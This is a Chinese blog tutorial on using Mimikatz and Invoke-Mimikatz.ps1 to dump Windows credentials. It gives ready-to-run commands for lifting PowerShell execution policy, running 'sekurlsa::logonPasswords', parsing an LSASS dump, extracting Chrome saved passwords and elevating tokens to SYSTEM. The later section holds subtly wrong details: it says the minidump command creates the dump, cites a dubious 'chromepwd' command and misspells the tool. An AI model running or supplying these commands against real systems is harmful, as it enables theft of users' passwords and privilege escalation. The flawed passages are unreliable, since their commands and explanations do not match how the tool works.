Mimikatz.ps1本地执行

本文介绍如何通过设置PowerShell执行策略为不受限,并导入及运行Invoke-Mimikatz.ps1模块来获取Windows系统中当前登录用户的凭证信息。此操作涉及调整PowerShell的安全策略并执行特定命令来读取敏感数据。
PS C:\Users\hacker> Get-ExecutionPolicy
Restricted

PS C:\Users\hacker> Set-ExecutionPolicy Unrestricted
 
PS C:\Users\hacker\Desktop> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Users\hacker\Desktop> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'

851155-20180320192120779-71726247.png

或者


C:\Users\hacker\Desktop>powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'

转载于:https://www.cnblogs.com/xiaoxiaoleo/p/8611768.html

### Mimikatz.exe 使用教程 #### 工具概述 Mimikatz 是一种用于 Windows 的安全工具,主要用于测试和研究操作系统级别的身份验证机制。该工具能够提取存储在内存中的凭证信息和其他敏感数据。 #### 基础命令结构 为了运行特定功能,通常采用如下格式调用 mimikatz[^1]: ```bash mimikatz.exe "module::command arguments" "exit" ``` #### 提取 LSA 进程转储并读取登录密码 当需要创建 LSASS (Local Security Authority Subsystem Service) 的内存映像,并从中检索明文形式的认证凭据时,可以按照下面的方式操作: ```bash mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" ``` 此指令序列会先生成名为 `lsass.dmp` 的文件,接着解析其中的内容以显示所有活动用户的账户详情及其对应的密码等信息[^2]。 #### Chrome 浏览器 Cookies 和 Passwords 获取 对于想要访问 Google Chrome 中保存下来的 cookies 或者已加密过的网站登陆凭证的情况,则可以通过加载相应的模块完成任务: ```powershell # 导入 PowerShell 脚本 Get-ChromeCreds.ps1 来获取Chrome保存的密码 Import-Module .\Get-ChromeCreds.ps1 Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::chromepwd"' ``` 上述脚本首先赋予必要的调试权限给当前会话环境,之后利用内置函数去解密 Chromium 类型浏览器所储存的数据项[^4]。 #### Token 操作 通过 token 模块可实现模拟高权限账号的行为模式,在合法授权范围内执行特权级的任务而不必实际拥有那些权利。具体做法包括但不限于枚举现有令牌列表、复制 system 用户的身份标识符以及适时切换回初始状态。 ```batchfile :: 列出可用 tokens 并尝试提升至 SYSTEM 级别 mimikatz # privilege::debug mimikatz # token::whoami mimikatz # token::elevate ... :: 结束后记得还原原始上下文 mivkatz # token::revert ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值